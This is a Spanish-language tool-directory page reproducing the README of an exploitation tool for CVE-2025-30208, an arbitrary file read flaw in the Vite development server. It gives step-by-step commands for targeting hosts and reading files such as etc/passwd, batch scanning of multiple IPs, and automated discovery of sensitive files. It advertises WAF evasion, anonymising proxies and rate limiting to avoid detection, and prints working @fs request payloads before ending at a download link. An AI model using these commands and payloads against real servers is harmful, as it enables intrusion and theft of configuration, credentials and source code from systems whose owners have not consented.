Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 es una vulnerabilidad de gravedad media de lectura arbitraria de archivos en el servidor de desarrollo de Vite (una popular herramienta de compilación para frontend) | Kitploit
Herramientas/GitHubGitHub/themehackers/cve-2025-30208
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 es una vulnerabilidad de gravedad media de lectura arbitraria de archivos en el servidor de desarrollo de Vite (una popular herramienta de compilación para frontend)

Ver Repositorio
1014hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 Escáner de Vulnerabilidad de Lectura Arbitraria de Archivos en Vite CVE-2025-30208

Python License Security Status Modular

Escáner de vulnerabilidades avanzado para CVE-2025-30208 con características de nivel empresarial

Herramienta profesional de pruebas de penetración para la detección de la vulnerabilidad de lectura arbitraria de archivos en Vite

🚀 Inicio Rápido • 📋 Características • 🔧 Uso • 📊 Ejemplos • 🛡️ Seguridad


📖 Descripción General

Este es un escáner de vulnerabilidades integral diseñado para detectar y explotar la vulnerabilidad CVE-2025-30208 en los servidores de desarrollo de Vite. La vulnerabilidad permite el acceso de lectura arbitraria de archivos a través de los endpoints del sistema de archivos de Vite, pudiendo exponer archivos de configuración sensibles, código fuente e información del sistema.

🎯 Qué Hace Esta Herramienta

  • Detecta instancias vulnerables de Vite en redes
  • Explota la vulnerabilidad de lectura arbitraria de archivos de forma segura
  • Descubre archivos sensibles y datos de configuración
  • Reporta los hallazgos en múltiples formatos (HTML, JSON, Consola)
  • Gestiona sesiones de escaneo y configuraciones
  • Maneja errores de forma elegante con mecanismos automáticos de reintento

🏗️ Arquitectura Modular

La herramienta ahora cuenta con una arquitectura modular para un mejor mantenimiento y extensibilidad:

  • CVE-2025-30208.py - Aplicación principal del escáner
  • payloads.py - Payloads avanzados de explotación (más de 60 variaciones)
  • sensitive_files.py - Base de datos integral de archivos sensibles (más de 200 archivos)
  • html_template.py - Plantilla mejorada de informes HTML estilo hacker

🚀 Inicio Rápido

Requisitos Previos

pip3 install -r requirements.txt

Uso Básico

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Características

🔍 Detección Central de Vulnerabilidades

  • Más de 60 Payloads Avanzados: Técnicas integrales de explotación para la máxima detección
  • Detección Inteligente: Análisis inteligente de respuestas para evitar falsos positivos
  • Validación en Tiempo Real: Validación continua de las respuestas del objetivo
  • Pruebas Integrales: Prueba todos los endpoints vulnerables conocidos

🛡️ Características de Seguridad Mejoradas

  • Soporte de Proxy: Configuración de proxy HTTP/HTTPS para anonimato
  • Cabeceras Personalizadas: Evita WAF/IPS con cabeceras HTTP personalizadas
  • Límite de Tasa: Retrasos configurables para evitar la detección
  • Gestión de Sesiones: Guarda y restaura sesiones de escaneo
  • Validación de Entrada: Validación integral de parámetros

🔧 Capacidades Avanzadas

  • Escaneo por Lotes: Escaneo multi-hilo de múltiples objetivos
  • Descubrimiento de Archivos Sensibles: Descubrimiento automático de más de 200 archivos sensibles
  • Pruebas de Conectividad: Pruebas de protocolo TCP/UDP/HTTP/HTTPS
  • Recuperación de Errores: Reintento automático con retroceso exponencial
  • Registro Integral: Registros detallados con marcas de tiempo

📊 Informes y Salida

  • 🎨 Informes HTML Mejorados: Hermosos informes de vulnerabilidades estilo hacker con animaciones
  • Exportación JSON: Datos estructurados para análisis posteriores
  • Salida de Consola: Retroalimentación en tiempo real con códigos de color
  • Archivos de Registro: Pistas de auditoría detalladas
  • Interfaz Web Interactiva: Servidor web integrado para visualizar informes

🔧 Guía de Uso

1. Configuración Básica

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Prueba de Vulnerabilidad

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Escaneo por Lotes

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Descubrimiento de Archivos Sensibles

CVE-2025-30208 > scan

5. Configuración Avanzada

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Informes HTML Mejorados

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Referencia de Comandos

ComandoDescripciónEjemplo
set <option> <value>Establece opciones de configuraciónset RHOST 192.168.1.100
show optionsMuestra la configuración actualshow options
editEditor interactivo de opcionesedit
run / exploitEjecuta la prueba de vulnerabilidadrun
batchEscanea múltiples objetivos por lotesbatch
scanDescubre archivos sensiblesscan
pullExporta los resultados a HTML/JSONpull
web [on|off|port]Servidor web para informes HTMLweb 8080
saveGuarda la configuración de la sesiónsave
loadCarga la configuración de la sesiónload
testPrueba la conectividad con el objetivotest
validateValida la configuración actualvalidate
verboseAlterna el modo verboseverbose
proxyConfigura los ajustes de proxyproxy
headersEstablece cabeceras HTTP personalizadasheaders
rateConfigura el límite de tasarate
logMuestra la información de registrolog
help / ?Muestra la ayudahelp
exit / quitSale de la herramientaexit

⚙️ Opciones de Configuración

OpciónDescripciónPor DefectoValidación
RHOSTDirección IP/host del objetivo-Validación de hostname/IP
RPORTNúmero de puerto del objetivo-Rango de puertos (1-65535)
FILEPATHRuta de archivo a probaretc/passwdValidación de ruta
PROXYURL de proxy HTTP/HTTPS-Validación de formato de URL
VERBOSEHabilita la salida verbosefalseValidación booleana
RATE_LIMITRetraso entre solicitudes (segundos)0.3Validación numérica
THREADSNúmero de hilos para el escaneo por lotes5Validación de entero
TIMEOUTTiempo de espera de solicitud (segundos)5Validación de entero
CUSTOM_HEADERSCabeceras HTTP personalizadas (JSON){}Validación de formato JSON

🎨 Sistema de Payloads Mejorado

El escáner ahora utiliza más de 60 variaciones de payloads organizadas en payloads.py:

Payloads @fs Principales

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Variaciones de Parámetros Extendidos

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Variaciones Específicas de Vite

Descargar herramienta